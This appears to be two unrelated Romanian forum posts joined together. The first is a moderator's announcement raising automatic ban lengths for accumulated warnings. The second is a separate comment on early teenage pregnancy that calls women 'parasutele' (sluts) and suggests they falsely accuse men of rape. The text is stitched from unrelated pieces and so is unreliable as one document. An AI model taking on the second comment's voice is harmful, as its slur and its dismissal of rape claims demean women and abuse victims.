ACTUALIZARE: AICI. Sa explic, sa inteleaga toata lumea. Pentru o abatere nu foarte grava, pentru care nu se poate da ban (to ban = a interzice, provine din limba engleza si s-a cam romanizat, folosim verbul "a bana" si "ban" folosim pentru interdictie, deci daca ai ban nu mai intrii pe forum), se da un avertisment. Pana acum, la 3 avertismente se primea ban automat 3 zile, la 4 avertismente ban 4 zile, la 5 se primea 5 zile si la 6 permanent. Ceea ce era cam dragut pentru voi, nu meritati asa ceva. Asadar, am facut cateva mici modificari la banurile automate. Un mic tabel care contine: numarul de avertismente | durata banului: - 3 avertismente - ban 5 zile - 4 avertismente - ban 10 zile - 5 avertismente - ban 30 de zile (o luna) - 6 avertismente - ban permanent Ma bucur ca va place. O zi buna

E putin exagerata povestea, dar sunt si cazuri asemanatoare. Se intreaba lumea cum de ajung sa faca copii de la 12 ani, pai daca nu stiu nici cate gauri au... Si parasutele te dau in judecata ca le-ai violat...